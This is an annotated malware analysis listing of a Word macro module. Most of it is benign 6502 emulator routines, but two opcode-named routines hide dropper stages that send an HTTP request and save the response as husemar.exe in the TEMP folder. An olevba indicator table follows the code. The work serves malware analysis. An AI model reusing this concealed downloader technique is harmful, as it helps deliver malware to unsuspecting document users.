  774.  P = (P And &HFE) Or ((Value \ 128) And &H1)
  775.  Value = (Value * 2) And &HFF
  776.  Value = Value Or saveflags
  777.  Write6502 savepc, (Value And &HFF)
  778.  If (Value) Then
  779.  P = P And &HFD
  780.  Else
  781.  P = P Or &H2
  782.  End If
  783.  If (Value And &H80) Then
  784.  P = P Or &H80
  785.  Else
  786.  P = P And &H7F
  787.  End If
  788. End Sub
  789. Public Sub rola6502()
  790.  saveflags = (P And &H1)
  791.  P = (P And &HFE) Or ((A \ 128) And &H1)
  792.  A = (A * 2) And &HFF
  793.  A = A Or saveflags
  794.  If (A) Then
  795.  P = P And &HFD
  796.  Else
  797.  P = P Or &H2
  798.  End If
  799.  If (A And &H80) Then
  800.  P = P Or &H80
  801.  Else
  802.  P = P And &H7F
  803.  End If
  804. End Sub
  805. Public Sub ror6502()
  806.  saveflags = (P And &H1)
  807.  adrmode opcode
  808.  Value = Read6502(savepc)
  809.  P = (P And &HFE) Or (Value And &H1)
  810.  Value = (Value \ 2) And &HFF
  811.  If (saveflags) Then
  812.  Value = Value Or &H80
  813.  End If
  814.  Write6502 (savepc), Value And &HFF
  815.  If (Value) Then
  816.  P = P And &HFD
  817.  Else
  818.  P = P Or &H2
  819.  End If
  820.  If (Value And &H80) Then
  821.  P = P Or &H80
  822.  Else
  823.  P = P And &H7F
  824.  End If
  825. End Sub
  826. Public Sub rora6502()
       ' Fourth stage of the autoopen chain, hidden under a 6502 opcode name among the
       ' emulator routines of this module. It writes the downloaded bytes to disk and
       ' returns; the rotate-right logic after Exit Sub is unreachable.
  827.  
  828. Dim rti6611 As Variant
       ' Body of the HTTP response from the request sent in txs6502.
  829. rti6611 = phy65007.responseBody
  830. Dim rti6612 As Integer
       ' Evaluates to 2. As the second argument of ADODB.Stream.SaveToFile that is
       ' adSaveCreateOverWrite; the arithmetic avoids a literal 2 at the call site.
  831. rti6612 = 3 - 1
  832.     phy65008.write rti6611
       ' phy650002 is the <TEMP>\husemar.exe path built in txs6502.
  833.     phy65008.savetofile phy650002, rti6612
  834. Exit Sub
  835.  saveflags = (P And &H1)
  836.  P = (P And &HFE) Or (A And &H1)
  837.  A = (A \ 2) And &HFF
  838.  If (saveflags) Then
  839.  A = A Or &H80
  840.  End If
  841.  If (A) Then
  842.  P = P And &HFD
  843.  Else
  844.  P = P Or &H2
  845.  End If
  846.  If (A And &H80) Then
  847.  P = P Or &H80
  848.  Else
  849.  P = P And &H7F
  850.  End If
  851. End Sub
  852. Public Sub rti6502()
  853.  
  854.  s = (s + 1) And &HFF
  855.  P = Read6502(s + &H100&) Or &H20
  856.  s = (s + 1) And &HFF
  857.  PC = Read6502(s + &H100&)
  858.  s = (s + 1) And &HFF
  859.  PC = PC + (Read6502(s + &H100) * &H100&)
  860. End Sub
  861. Public Sub rts6502()
  862.  s = (s + 1) And &HFF
  863.  PC = Read6502(s + &H100)
  864.  s = (s + 1) And &HFF
  865.  PC = PC + (Read6502(s + &H100) * &H100&)
  866.  PC = PC + 1
  867. End Sub
  868. Public Sub sbc6502()
  869.  adrmode opcode
  870.  Value = Read6502(savepc) Xor &HFF
  871.  saveflags = (P And &H1)
  872.  sum = A
  873.  sum = (sum + Value) And &HFF
  874.  sum = (sum + (saveflags * 16)) And &HFF
  875.  If ((sum > &H7F) Or (sum <= -&H80)) Then
  876.  P = P Or &H40
  877.  Else
  878.  P = P And &HBF
  879.  End If
  880.  sum = A + (Value + saveflags)
  881.  If (sum > &HFF) Then
  882.  P = P Or &H1
  883.  Else
  884.  P = P And &HFE
  885.  End If
  886.  A = sum And &HFF
  887.  If (P And &H8) Then
  888.  A = (A - &H66) And &HFF
  889.  P = P And &HFE
  890.  If ((A And &HF) > &H9) Then
  891.  A = (A + &H6) And &HFF
  892.  End If
  893.  If ((A And &HF0) > &H90) Then
  894.  A = (A + &H60) And &HFF
  895.  P = P Or &H1
  896.  End If
  897.  Else
  898.  clockticks6502 = clockticks6502 + 1
  899.  End If
  900.  'Debug.Print "sbc6502"
  901. If (A) Then
  902.  P = P And &HFD
  903.  Else
  904.  P = P Or &H2
  905.  End If
  906.  If (A And &H80) Then
  907.  P = P Or &H80
  908.  Else
  909.  P = P And &H7F
  910.  End If
  911. End Sub
  912. Public Sub sec6502()
  913.  P = P Or &H1
  914. End Sub
  915. Public Sub sed6502()
  916.  P = P Or &H8
  917. End Sub
  918. Public Sub sei6502()
  919.  P = P Or &H4
  920. End Sub
  921. Public Sub sta6502()
  922.  adrmode opcode
  923.  Write6502 (savepc), A
  924. End Sub
  925. Public Sub stx6502()
  926.  adrmode opcode
  927.  Write6502 (savepc), X
  928. End Sub
  929. Public Sub sty6502()
  930.  adrmode opcode
  931.  Write6502 (savepc), Y
  932. End Sub
  933. Public Sub tax6502()
  934.  X = A
  935.  If (X) Then
  936.  P = P And &HFD
  937.  Else
  938.  P = P Or &H2
  939.  End If
  940.  If (X And &H80) Then
  941.  P = P Or &H80
  942.  Else
  943.  P = P And &H7F
  944.  End If
  945. End Sub
  946. Public Sub tay6502()
  947.  Y = A
  948.  If (Y) Then
  949.  P = P And &HFD
  950.  Else
  951.  P = P Or &H2
  952.  End If
  953.  If (Y And &H80) Then
  954.  P = P Or &H80
  955.  Else
  956.  P = P And &H7F
  957.  End If
  958. End Sub
  959. Public Sub tsx6502()
  960.  X = s
  961.  If (X) Then
  962.  P = P And &HFD
  963.  Else
  964.  P = P Or &H2
  965.  End If
  966.  If (X And &H80) Then
  967.  P = P Or &H80
  968.  Else
  969.  P = P And &H7F
  970.  End If
  971. End Sub
  972. Public Sub txa6502()
  973.  A = X
  974.  If (A) Then
  975.  P = P And &HFD
  976.  Else
  977.  P = P Or &H2
  978.  End If
  979.  If (A And &H80) Then
  980.  P = P Or &H80
  981.  Else
  982.  P = P And &H7F
  983.  End If
  984. End Sub
  985. Public Sub txs6502()
       ' Third stage of the autoopen chain, hidden under a 6502 opcode name. It sends
       ' the HTTP request, builds the drop path and opens the output stream, then
       ' returns; the original "s = X" after Exit Sub is unreachable.
       ' phy65009 is the WScript.Shell process environment set up in runAlleStatMod.
  986. phy650001 = phy65009("TEMP")
       ' Sends the GET prepared in PreencherDireita. That Open call passed False for
       ' the async argument, so this call blocks until the response has arrived.
  987. phy65007.Send
       ' The file name is assembled from fragments; olevba resolves the expression to
       ' "\husemar.exe" and lists husemar.exe as an IOC in its summary table.
  988. phy650002 = phy650001 + "\" + "husemar." + "e" + "xe"
  989. With phy65008
       ' Type = 1 is adTypeBinary on an ADODB.Stream.
  990.    .Type = 1
  991.    .Open
  992. End With
  993. Exit Sub
  994.  s = X
  995. End Sub
  996. Public Sub tya6502()
  997.  A = Y
  998.  If (A) Then
  999.  P = P And &HFD
  1000.  Else
  1001.  P = P Or &H2
  1002.  End If
  1003.  If (A And &H80) Then
  1004.  P = P Or &H80
  1005.  Else
  1006.  P = P And &H7F
  1007.  End If
  1008. End Sub
  1009. Public Sub bra6502()
  1010.  adrmode opcode
  1011.  PC = PC + savepc
  1012.  clockticks6502 = clockticks6502 + 1
  1013. End Sub
  1014. Public Sub dea6502()
  1015.  A = (A - 1) And &HFF
  1016.  If (A) Then
  1017.  P = P And &HFD
  1018.  Else
  1019.  P = P Or &H2
  1020.  End If
  1021.  If (A And &H80) Then
  1022.  P = P Or &H80
  1023.  Else
  1024.  P = P And &H7F
  1025.  End If
  1026. End Sub
  1027. Public Sub ina6502()
  1028.  A = (A + 1) And &HFF
  1029.  If (A) Then
  1030.  P = P And &HFD
  1031.  Else
  1032.  P = P Or &H2
  1033.  End If
  1034.  If (A And &H80) Then
  1035.  P = P Or &H80
  1036.  Else
  1037.  P = P And &H7F
  1038.  End If
  1039. End Sub
  1040. Public Sub phx6502()
  1041.  Write6502 &H100 + s, X
  1042.  s = (s - 1) And &HFF
  1043. End Sub
  1044. Public Sub plx6502()
  1045.  s = (s + 1) And &HFF
  1046.  X = Read6502(s + &H100)
  1047.  If (X) Then
  1048.  P = P And &HFD
  1049.  Else
  1050.  P = P Or &H2
  1051.  End If
  1052.  If (X And &H80) Then
  1053.  P = P Or &H80
  1054.  Else
  1055.  P = P And &H7F
  1056.  End If
  1057. End Sub
  1058. Public Sub phy6502()
  1059.  Write6502 &H100 + s, Y
  1060.  s = (s - 1) And &HFF
  1061. End Sub
  1062. Public Sub ply6502()
  1063.  s = (s + 1) And &HFF
  1064.  Y = Read6502(s + &H100)
  1065.  If (Y) Then
  1066.  P = P And &HFD
  1067.  Else
  1068.  P = P Or &H2
  1069.  End If
  1070.  If (Y And &H80) Then
  1071.  P = P Or &H80
  1072.  Else
  1073.  P = P And &H7F
  1074.  End If
  1075. End Sub
  1076.  
  1077.  
  1078.  
  1079. +------------+----------------------+-----------------------------------------+
  1080. | Type       | Keyword              | Description                             |
  1081. +------------+----------------------+-----------------------------------------+
  1082. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  1083. | Suspicious | Open                 | May open a file                         |
  1084. | Suspicious | Shell                | May run an executable file or a system  |
  1085. |            |                      | command                                 |
  1086. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1087. |            |                      | command                                 |
  1088. | Suspicious | Run                  | May run an executable file or a system  |
  1089. |            |                      | command                                 |
  1090. | Suspicious | Shell.Application    | May run an application (if combined     |
  1091. |            |                      | with CreateObject)                      |
  1092. | Suspicious | CreateObject         | May create an OLE object                |
  1093. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1094. |            |                      | strings                                 |
  1095. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  1096. |            |                      | strings                                 |
  1097. | Suspicious | ADODB.Stream         | May create a text file                  |
  1098. | Suspicious | SaveToFile           | May create a text file                  |
  1099. | Suspicious | Write                | May write to a file (if combined with   |
  1100. |            |                      | Open)                                   |
  1101. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1102. |            |                      | (obfuscation: VBA expression)           |
  1103. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  1104. |            |                      | may be used to obfuscate strings        |
  1105. |            |                      | (option --decode to see all)            |
  1106. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1107. |            | Strings              | may be used to obfuscate strings        |
  1108. |            |                      | (option --decode to see all)            |
  1109. | IOC        | husemar.exe          | Executable file name (obfuscation: VBA  |
  1110. |            |                      | expression)                             |
  1111. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  1112. | VBA string | Das Modell kann nun  | "Das Modell kann nun bearbeitet werden. |
  1113. |            | bearbeitet werden.   | " &  "Ge?nderte Default-Werte werden    |
  1114. |            | Ge?nderte Default-   | beim Schliessen exportiert."            |
  1115. |            | Werte werden beim    |                                         |
  1116. |            | Schliessen           |                                         |
  1117. |            | exportiert.          |                                         |
  1118. | VBA string | \husemar.exe         | "\" + "husemar." + "e" + "xe"           |
  1119. +------------+----------------------+-----------------------------------------+